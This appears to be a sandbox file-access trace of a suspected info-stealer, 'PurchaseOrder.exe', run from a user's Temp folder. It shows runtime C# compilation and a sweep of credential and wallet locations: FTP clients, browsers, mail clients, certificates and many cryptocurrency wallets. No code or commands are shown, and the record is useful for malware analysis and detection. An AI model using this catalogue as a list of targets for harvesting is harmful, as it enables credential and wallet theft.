C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
C:\Users\Seven01\AppData\Local\Temp\PurchaseOrder.exe.config
C:\Users\Seven01\AppData\Local\Temp\PurchaseOrder.exe
C:\Users\Seven01\AppData\Local\Temp\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\system\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\ProgramData\Oracle\Java\javapath\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\wbem\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\WindowsPowerShell\v1.0\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSVCR120_CLR0400.dll
C:\Windows\System32\MSVCR120_CLR0400.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoree.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config
C:\Windows\Microsoft.NET\Framework\v4.0.30319\fusion.localgac
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll.aux
C:\Users
C:\Users\Seven01
C:\Users\Seven01\AppData
C:\Users\Seven01\AppData\Local
C:\Users\Seven01\AppData\Local\Temp
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ole32.dll
\Device\KsecDD
C:\Windows\assembly\NativeImages_v4.0.30319_32\84V0eUYQwXugtkJ7\*
C:\Users\Seven01\AppData\Local\Temp\PurchaseOrder.INI
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll
C:\Windows\assembly\pubpol36.dat
C:\Windows\assembly\GAC\PublisherPolicy.tme
C:\Windows\Microsoft.Net\assembly\GAC_32\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll.aux
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Configuration\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.Xml.dll
C:\Windows\Microsoft.Net\assembly\GAC_32\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll.aux
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\nlssorting.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\SortDefault.nlp
C:\Users\Seven01\AppData\Local\Temp\hru5mklf.tmp
C:\Users\Seven01\AppData\Local\Temp\hru5mklf.0.cs
C:\Users\Seven01\AppData\Local\Temp\hru5mklf.dll
C:\Users\Seven01\AppData\Local\Temp\hru5mklf.cmdline
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
C:\Users\Seven01\AppData\Local\Temp\hru5mklf.out
C:\Users\Seven01\AppData\Local\Temp\hru5mklf.err
C:\Users\Seven01\AppData\Local\Temp\hru5mklf.pdb
C:\Windows\Microsoft.Net\assembly\GAC_32\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll.aux
C:\Users\Seven01\AppData\Local\Temp\PurchaseOrder.exe.Local\
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll
C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\shell32.dll
C:\Users\Seven01\AppData\Roaming
C:\Users\Seven01\AppData\Roaming\null
C:\Users\Seven01\AppData\Roaming\null:Zone.Identifier
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\it-IT\mscorrc.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\it-IT\mscorrc.dll.DLL
C:\Windows\Microsoft.NET\Framework\v4.0.30319\it\mscorrc.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\it\mscorrc.dll.DLL
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
C:\Windows\SysWOW64\it-IT\KERNELBASE.dll.mui
C:\Windows\assembly\GAC_64
C:\Windows\assembly\GAC_64\mscorlib.resources
C:\Windows\assembly\GAC_32
C:\Windows\assembly\GAC_32\mscorlib.resources
C:\Windows\assembly\GAC_MSIL
C:\Windows\assembly\GAC_MSIL\mscorlib.resources
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\*
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll
C:\Windows\assembly\GAC
C:\Windows\assembly\GAC\mscorlib.resources
C:\Windows\Microsoft.Net\assembly\GAC_64
C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib.resources
C:\Windows\Microsoft.Net\assembly\GAC_32
C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib.resources
C:\Windows\Microsoft.Net\assembly\GAC_MSIL
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\mscorlib.resources
C:\Windows\Microsoft.Net\assembly\GAC
C:\Windows\Microsoft.Net\assembly\GAC_32\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll.aux
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Xml.Linq\v4.0_4.0.0.0__b77a5c561934e089\System.Xml.Linq.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\ntdll.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\1040\cscui.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\1040\cscui.dll.DLL
C:\Windows\Microsoft.NET\Framework\v4.0.30319\0\cscui.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\0\cscui.dll.DLL
C:\Windows\Microsoft.NET\Framework\v4.0.30319\1033\cscui.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\default.win32manifest
C:\Windows\Microsoft.NET\Framework\v4.0.30319\alink.dll
C:\Windows\System32\mscoree.dll.local
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe.config
C:\Windows\Microsoft.NET\Framework\v4.0.30319\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Users\Seven01\AppData\Local\Temp\System.Management.dll
C:\Windows
C:\Windows\Microsoft.NET
C:\Windows\Microsoft.NET\Framework
C:\Windows\Microsoft.NET\Framework\v4.0.30319
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Management.dll
C:\Users\Seven01\AppData\Local\Temp\System.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.dll
C:\Users\Seven01\AppData\Local\Temp\System.Drawing.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Drawing.dll
C:\Users\Seven01\AppData\Local\Temp\System.Core.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Core.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorpehost.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\diasymreader.dll
C:\Users\Seven01\AppData\Local\Temp\CSCF76FE7C21302401AB124AE595F9F7E1A.TMP
C:\Users\Seven01\AppData\Local\Temp\RES4E93.tmp
C:\Windows\System32\tzres.dll
C:\Windows\System32\it-IT\tzres.dll.mui
C:\Users\Seven01\AppData\Local\Temp\HWID
C:\Windows\wcx_ftp.ini
C:\Users\Seven01\wcx_ftp.ini
C:\Users\Seven01\AppData\Roaming\GHISLER\wcx_ftp.ini
C:\ProgramData\GHISLER\wcx_ftp.ini
C:\Users\Seven01\AppData\Local\GHISLER\wcx_ftp.ini
C:\Windows\win.ini
C:\Program Files (x86)\Common Files\Ipswitch\WS_FTP\*.*
C:\Users\Seven01\AppData\Roaming\Ipswitch\*.*
C:\ProgramData\Ipswitch\*.*
C:\Users\Seven01\AppData\Local\Ipswitch\*.*
C:\Users\Seven01\AppData\Roaming\GlobalSCAPE\CuteFTP\sm.dat
C:\Users\Seven01\AppData\Roaming\GlobalSCAPE\CuteFTP\*.*
C:\Users\Seven01\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\sm.dat
C:\Users\Seven01\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\*.*
C:\Users\Seven01\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\sm.dat
C:\Users\Seven01\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\*.*
C:\Users\Seven01\AppData\Roaming\CuteFTP\sm.dat
C:\Users\Seven01\AppData\Roaming\CuteFTP\*.*
C:\ProgramData\GlobalSCAPE\CuteFTP\sm.dat
C:\ProgramData\GlobalSCAPE\CuteFTP\*.*
C:\ProgramData\GlobalSCAPE\CuteFTP Pro\sm.dat
C:\ProgramData\GlobalSCAPE\CuteFTP Pro\*.*
C:\ProgramData\GlobalSCAPE\CuteFTP Lite\sm.dat
C:\ProgramData\GlobalSCAPE\CuteFTP Lite\*.*
C:\ProgramData\CuteFTP\sm.dat
C:\ProgramData\CuteFTP\*.*
C:\Users\Seven01\AppData\Local\GlobalSCAPE\CuteFTP\sm.dat
C:\Users\Seven01\AppData\Local\GlobalSCAPE\CuteFTP\*.*
C:\Users\Seven01\AppData\Local\GlobalSCAPE\CuteFTP Pro\sm.dat
C:\Users\Seven01\AppData\Local\GlobalSCAPE\CuteFTP Pro\*.*
C:\Users\Seven01\AppData\Local\GlobalSCAPE\CuteFTP Lite\sm.dat
C:\Users\Seven01\AppData\Local\GlobalSCAPE\CuteFTP Lite\*.*
C:\Users\Seven01\AppData\Local\CuteFTP\sm.dat
C:\Users\Seven01\AppData\Local\CuteFTP\*.*
C:\Program Files (x86)\GlobalSCAPE\CuteFTP\sm.dat
C:\Program Files (x86)\GlobalSCAPE\CuteFTP\*.*
C:\Program Files (x86)\GlobalSCAPE\CuteFTP Pro\sm.dat
C:\Program Files (x86)\GlobalSCAPE\CuteFTP Pro\*.*
C:\Program Files (x86)\GlobalSCAPE\CuteFTP Lite\sm.dat
C:\Program Files (x86)\GlobalSCAPE\CuteFTP Lite\*.*
C:\Program Files (x86)\CuteFTP\sm.dat
C:\Program Files (x86)\CuteFTP\*.*
C:\Users\Seven01\AppData\Roaming\FlashFXP\3\Sites.dat
C:\Users\Seven01\AppData\Roaming\FlashFXP\4\Sites.dat
C:\Users\Seven01\AppData\Roaming\FlashFXP\3\Quick.dat
C:\Users\Seven01\AppData\Roaming\FlashFXP\4\Quick.dat
C:\Users\Seven01\AppData\Roaming\FlashFXP\3\History.dat
C:\Users\Seven01\AppData\Roaming\FlashFXP\4\History.dat
C:\ProgramData\FlashFXP\3\Sites.dat
C:\ProgramData\FlashFXP\4\Sites.dat
C:\ProgramData\FlashFXP\3\Quick.dat
C:\ProgramData\FlashFXP\4\Quick.dat
C:\ProgramData\FlashFXP\3\History.dat
C:\ProgramData\FlashFXP\4\History.dat
C:\Users\Seven01\AppData\Local\FlashFXP\3\Sites.dat
C:\Users\Seven01\AppData\Local\FlashFXP\4\Sites.dat
C:\Users\Seven01\AppData\Local\FlashFXP\3\Quick.dat
C:\Users\Seven01\AppData\Local\FlashFXP\4\Quick.dat
C:\Users\Seven01\AppData\Local\FlashFXP\3\History.dat
C:\Users\Seven01\AppData\Local\FlashFXP\4\History.dat
C:\Users\Seven01\AppData\Roaming\FileZilla\sitemanager.xml
C:\Users\Seven01\AppData\Roaming\FileZilla\recentservers.xml
C:\Users\Seven01\AppData\Roaming\FileZilla\filezilla.xml
C:\ProgramData\FileZilla\sitemanager.xml
C:\ProgramData\FileZilla\recentservers.xml
C:\ProgramData\FileZilla\filezilla.xml
C:\Users\Seven01\AppData\Local\FileZilla\sitemanager.xml
C:\Users\Seven01\AppData\Local\FileZilla\recentservers.xml
C:\Users\Seven01\AppData\Local\FileZilla\filezilla.xml
C:\Users\Seven01\AppData\Local\BulletProof Software\*.*
C:\Users\Seven01\AppData\Roaming\BulletProof Software\*.*
C:\ProgramData\BulletProof Software\*.*
C:\Users\Seven01\AppData\Roaming\SmartFTP\*.*
C:\ProgramData\SmartFTP\*.*
C:\Users\Seven01\AppData\Local\SmartFTP\*.*
C:\Users\Seven01\AppData\Roaming\TurboFTP\*.*
C:\ProgramData\TurboFTP\*.*
C:\Users\Seven01\AppData\Local\TurboFTP\*.*
C:\Users\Seven01\AppData\Roaming\FTP Explorer\*.*
C:\ProgramData\FTP Explorer\*.*
C:\Users\Seven01\AppData\Local\FTP Explorer\*.*
C:\Users\Seven01\AppData\Roaming\Frigate3\*.*
C:\ProgramData\Frigate3\*.*
C:\Users\Seven01\AppData\Local\Frigate3\*.*
C:\Users\Seven01\AppData\Roaming\VanDyke\Config\Sessions\*.*
C:\ProgramData\VanDyke\Config\Sessions\*.*
C:\Users\Seven01\AppData\Local\VanDyke\Config\Sessions\*.*
C:\Users\Seven01\AppData\Roaming\FTPRush\*.*
C:\ProgramData\FTPRush\*.*
C:\Users\Seven01\AppData\Local\FTPRush\*.*
C:\Users\Seven01\AppData\Roaming\BitKinex\*.*
C:\ProgramData\BitKinex\*.*
C:\Users\Seven01\AppData\Local\BitKinex\*.*
C:\Users\Seven01\AppData\Roaming\ExpanDrive\drives.js
C:\Users\Seven01\AppData\Local\ExpanDrive\drives.js
C:\ProgramData\ExpanDrive\drives.js
C:\Users\Seven01\AppData\Roaming\GPSoftware\Directory Opus\*.*
C:\ProgramData\GPSoftware\Directory Opus\*.*
C:\Users\Seven01\AppData\Local\GPSoftware\Directory Opus\*.*
C:\Users\Seven01\AppData\Roaming\SharedSettings.ccs
C:\Users\Seven01\AppData\Roaming\SharedSettings.sqlite
C:\Users\Seven01\AppData\Roaming\SharedSettings_1_0_5.ccs
C:\Users\Seven01\AppData\Roaming\SharedSettings_1_0_5.sqlite
C:\ProgramData\SharedSettings.ccs
C:\ProgramData\SharedSettings.sqlite
C:\ProgramData\SharedSettings_1_0_5.ccs
C:\ProgramData\SharedSettings_1_0_5.sqlite
C:\Users\Seven01\AppData\Local\SharedSettings.ccs
C:\Users\Seven01\AppData\Local\SharedSettings.sqlite
C:\Users\Seven01\AppData\Local\SharedSettings_1_0_5.ccs
C:\Users\Seven01\AppData\Local\SharedSettings_1_0_5.sqlite
C:\Users\Seven01\AppData\Roaming\CoffeeCup Software\SharedSettings.ccs
C:\Users\Seven01\AppData\Roaming\CoffeeCup Software\SharedSettings.sqlite
C:\Users\Seven01\AppData\Roaming\CoffeeCup Software\SharedSettings_1_0_5.ccs
C:\Users\Seven01\AppData\Roaming\CoffeeCup Software\SharedSettings_1_0_5.sqlite
C:\ProgramData\CoffeeCup Software\SharedSettings.ccs
C:\ProgramData\CoffeeCup Software\SharedSettings.sqlite
C:\ProgramData\CoffeeCup Software\SharedSettings_1_0_5.ccs
C:\ProgramData\CoffeeCup Software\SharedSettings_1_0_5.sqlite
C:\Users\Seven01\AppData\Local\CoffeeCup Software\SharedSettings.ccs
C:\Users\Seven01\AppData\Local\CoffeeCup Software\SharedSettings.sqlite
C:\Users\Seven01\AppData\Local\CoffeeCup Software\SharedSettings_1_0_5.ccs
C:\Users\Seven01\AppData\Local\CoffeeCup Software\SharedSettings_1_0_5.sqlite
C:\Users\Seven01\AppData\Roaming\LeapWare\LeapFTP\*.*
C:\ProgramData\LeapWare\LeapFTP\*.*
C:\Users\Seven01\AppData\Local\LeapWare\LeapFTP\*.*
C:\Windows\32BitFtp.ini
C:\Users\Seven01\AppData\Roaming\NetDrive\*.*
C:\ProgramData\NetDrive\*.*
C:\Users\Seven01\AppData\Local\NetDrive\*.*
C:\Users\Seven01\AppData\Roaming\*.*
C:\ProgramData\*.*
C:\Users\Seven01\AppData\Local\*.*
C:\Users\Seven01\AppData\Roaming\Opera Software\*.*
C:\Users\Seven01\AppData\Local\Opera Software\*.*
C:\ProgramData\Opera Software\*.*
C:\Users\Seven01\AppData\Roaming\AceBIT\*.*
C:\ProgramData\AceBIT\*.*
C:\Users\Seven01\AppData\Local\AceBIT\*.*
C:\Users\Seven01\AppData\Roaming\RhinoSoft.com\*.*
C:\ProgramData\RhinoSoft.com\*.*
C:\Users\Seven01\AppData\Local\RhinoSoft.com\*.*
C:\Users\Seven01\AppData\Roaming\Mozilla\Firefox\*.*
C:\Users\Seven01\Desktop\*.*
C:\Users\Seven01\AppData\Roaming\FTPGetter\*.*
C:\ProgramData\FTPGetter\*.*
C:\Users\Seven01\AppData\Local\FTPGetter\*.*
C:\Users\Seven01\AppData\Roaming\Estsoft\ALFTP\*.*
C:\ProgramData\Estsoft\ALFTP\*.*
C:\Users\Seven01\AppData\Local\Estsoft\ALFTP\*.*
C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet Files
C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini
C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5
C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies
C:\Users\Seven01\AppData\Local\Microsoft\Windows\History
C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\desktop.ini
C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\History.IE5
C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\History.IE5\desktop.ini
C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\index.dat
C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\History.IE5\
C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat
C:\Users\Seven01\AppData\Roaming\Google\Chrome\*.*
C:\Users\Seven01\AppData\Local\Google\Chrome\*.*
C:\ProgramData\Google\Chrome\*.*
C:\Users\Seven01\AppData\Roaming\Chromium\*.*
C:\Users\Seven01\AppData\Local\Chromium\*.*
C:\ProgramData\Chromium\*.*
C:\Users\Seven01\AppData\Roaming\ChromePlus\*.*
C:\Users\Seven01\AppData\Local\ChromePlus\*.*
C:\ProgramData\ChromePlus\*.*
C:\Users\Seven01\AppData\Roaming\Bromium\*.*
C:\Users\Seven01\AppData\Local\Bromium\*.*
C:\ProgramData\Bromium\*.*
C:\Users\Seven01\AppData\Roaming\Nichrome\*.*
C:\Users\Seven01\AppData\Local\Nichrome\*.*
C:\ProgramData\Nichrome\*.*
C:\Users\Seven01\AppData\Roaming\Comodo\*.*
C:\Users\Seven01\AppData\Local\Comodo\*.*
C:\ProgramData\Comodo\*.*
C:\Users\Seven01\AppData\Roaming\RockMelt\*.*
C:\Users\Seven01\AppData\Local\RockMelt\*.*
C:\ProgramData\RockMelt\*.*
C:\Users\Seven01\AppData\Roaming\Sites\*.*
C:\Users\Seven01\AppData\Roaming\Visicom Media\*.*
C:\ProgramData\Sites\*.*
C:\ProgramData\Visicom Media\*.*
C:\Users\Seven01\AppData\Local\Sites\*.*
C:\Users\Seven01\AppData\Local\Visicom Media\*.*
C:\Users\Seven01\AppData\Roaming\Global Downloader\*.*
C:\ProgramData\Global Downloader\*.*
C:\Users\Seven01\AppData\Local\Global Downloader\*.*
C:\Users\Seven01\AppData\Roaming\BlazeFtp\*.*
C:\ProgramData\BlazeFtp\*.*
C:\Users\Seven01\AppData\Local\BlazeFtp\*.*
C:\ProgramData\3D-FTP\*.*
C:\ProgramData\SiteDesigner\*.*
C:\Users\Seven01\AppData\Roaming\NetSarang\*.*
C:\ProgramData\NetSarang\*.*
C:\Users\Seven01\AppData\Local\NetSarang\*.*
C:\Users\Seven01\Documents\*.*
C:\Users\Seven01\Documents\File di Outlook\*.*
C:\Users\Seven01\Documents\Immagini\*.*
C:\Users\Seven01\Documents\Musica\*.*
C:\Users\Seven01\Documents\Video\*.*
C:\Users\Seven01\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\*
C:\Users\Seven01\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\*
C:\Users\Seven01\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\*
C:\Users\Seven01\AppData\Roaming\Cyberduck\*.*
C:\ProgramData\Cyberduck\*.*
C:\Users\Seven01\AppData\Local\Cyberduck\*.*
C:\Users\Seven01\AppData\Roaming\Notepad++\*.*
C:\ProgramData\Notepad++\*.*
C:\Users\Seven01\AppData\Local\Notepad++\*.*
C:\Users\Seven01\AppData\Roaming\FTPInfo\*.*
C:\ProgramData\FTPInfo\*.*
C:\Users\Seven01\AppData\Local\FTPInfo\*.*
C:\Users\Seven01\AppData\Roaming\MapleStudio\ChromePlus\*.*
C:\Users\Seven01\AppData\Local\MapleStudio\ChromePlus\*.*
C:\ProgramData\MapleStudio\ChromePlus\*.*
C:\Users\Seven01\AppData\Roaming\Yandex\*.*
C:\Users\Seven01\AppData\Local\Yandex\*.*
C:\ProgramData\Yandex\*.*
C:\Users\Seven01\AppData\Roaming\INSoftware\NovaFTP\*.*
C:\ProgramData\INSoftware\NovaFTP\*.*
C:\Users\Seven01\AppData\Local\INSoftware\NovaFTP\*.*
C:\Users\Seven01\AppData\Roaming\Pocomail\*.*
C:\ProgramData\Pocomail\*.*
C:\Users\Seven01\AppData\Local\Pocomail\*.*
C:\Users\Seven01\AppData\Roaming\BatMail\*.*
C:\ProgramData\BatMail\*.*
C:\Users\Seven01\AppData\Local\BatMail\*.*
C:\Users\Seven01\AppData\Roaming\The Bat!\*.*
C:\ProgramData\The Bat!\*.*
C:\Users\Seven01\AppData\Local\The Bat!\*.*
C:\Users\Seven01\AppData\Roaming\Bitcoin\*.*
C:\ProgramData\Bitcoin\*.*
C:\Users\Seven01\AppData\Local\Bitcoin\*.*
C:\Users\Seven01\AppData\Roaming\Electrum\*.*
C:\ProgramData\Electrum\*.*
C:\Users\Seven01\AppData\Local\Electrum\*.*
C:\Users\Seven01\AppData\Roaming\MultiBit\*.*
C:\ProgramData\MultiBit\*.*
C:\Users\Seven01\AppData\Local\MultiBit\*.*
C:\Users\Seven01\AppData\Roaming\Maxprog\FTP Disk\*.*
C:\ProgramData\Maxprog\FTP Disk\*.*
C:\Users\Seven01\AppData\Local\Maxprog\FTP Disk\*.*
C:\Users\Seven01\AppData\Roaming\Litecoin\*.*
C:\ProgramData\Litecoin\*.*
C:\Users\Seven01\AppData\Local\Litecoin\*.*
C:\Users\Seven01\AppData\Roaming\Namecoin\*.*
C:\ProgramData\Namecoin\*.*
C:\Users\Seven01\AppData\Local\Namecoin\*.*
C:\Users\Seven01\AppData\Roaming\Terracoin\*.*
C:\ProgramData\Terracoin\*.*
C:\Users\Seven01\AppData\Local\Terracoin\*.*
C:\Users\Seven01\AppData\Roaming\Armory\*.*
C:\ProgramData\Armory\*.*
C:\Users\Seven01\AppData\Local\Armory\*.*
C:\Users\Seven01\AppData\Roaming\PPCoin\*.*
C:\ProgramData\PPCoin\*.*
C:\Users\Seven01\AppData\Local\PPCoin\*.*
C:\Users\Seven01\AppData\Roaming\Primecoin\*.*
C:\ProgramData\Primecoin\*.*
C:\Users\Seven01\AppData\Local\Primecoin\*.*
C:\Users\Seven01\AppData\Roaming\Feathercoin\*.*
C:\ProgramData\Feathercoin\*.*
C:\Users\Seven01\AppData\Local\Feathercoin\*.*
C:\Users\Seven01\AppData\Roaming\NovaCoin\*.*
C:\ProgramData\NovaCoin\*.*
C:\Users\Seven01\AppData\Local\NovaCoin\*.*
C:\Users\Seven01\AppData\Roaming\Freicoin\*.*
C:\ProgramData\Freicoin\*.*
C:\Users\Seven01\AppData\Local\Freicoin\*.*
C:\Users\Seven01\AppData\Roaming\Devcoin\*.*
C:\ProgramData\Devcoin\*.*
C:\Users\Seven01\AppData\Local\Devcoin\*.*
C:\Users\Seven01\AppData\Roaming\Franko\*.*
C:\ProgramData\Franko\*.*
C:\Users\Seven01\AppData\Local\Franko\*.*
C:\Users\Seven01\AppData\Roaming\ProtoShares\*.*
C:\ProgramData\ProtoShares\*.*
C:\Users\Seven01\AppData\Local\ProtoShares\*.*
C:\Users\Seven01\AppData\Roaming\Megacoin\*.*
C:\ProgramData\Megacoin\*.*
C:\Users\Seven01\AppData\Local\Megacoin\*.*
C:\Users\Seven01\AppData\Roaming\Quarkcoin\*.*
C:\ProgramData\Quarkcoin\*.*
C:\Users\Seven01\AppData\Local\Quarkcoin\*.*
C:\Users\Seven01\AppData\Roaming\Worldcoin\*.*
C:\ProgramData\Worldcoin\*.*
C:\Users\Seven01\AppData\Local\Worldcoin\*.*
C:\Users\Seven01\AppData\Roaming\Infinitecoin\*.*
C:\ProgramData\Infinitecoin\*.*
C:\Users\Seven01\AppData\Local\Infinitecoin\*.*
C:\Users\Seven01\AppData\Roaming\Ixcoin\*.*
C:\ProgramData\Ixcoin\*.*
C:\Users\Seven01\AppData\Local\Ixcoin\*.*
C:\Users\Seven01\AppData\Roaming\Anoncoin\*.*
C:\ProgramData\Anoncoin\*.*
C:\Users\Seven01\AppData\Local\Anoncoin\*.*
C:\Users\Seven01\AppData\Roaming\BBQcoin\*.*
C:\ProgramData\BBQcoin\*.*
C:\Users\Seven01\AppData\Local\BBQcoin\*.*
C:\Users\Seven01\AppData\Roaming\Digitalcoin\*.*
C:\ProgramData\Digitalcoin\*.*
C:\Users\Seven01\AppData\Local\Digitalcoin\*.*
C:\Users\Seven01\AppData\Roaming\Mincoin\*.*
C:\ProgramData\Mincoin\*.*
C:\Users\Seven01\AppData\Local\Mincoin\*.*
C:\Users\Seven01\AppData\Roaming\GoldCoin (GLD)\*.*
C:\ProgramData\GoldCoin (GLD)\*.*
C:\Users\Seven01\AppData\Local\GoldCoin (GLD)\*.*
C:\Users\Seven01\AppData\Roaming\Yacoin\*.*
C:\ProgramData\Yacoin\*.*
C:\Users\Seven01\AppData\Local\Yacoin\*.*
C:\Users\Seven01\AppData\Roaming\Zetacoin\*.*
C:\ProgramData\Zetacoin\*.*
C:\Users\Seven01\AppData\Local\Zetacoin\*.*
C:\Users\Seven01\AppData\Roaming\Fastcoin\*.*
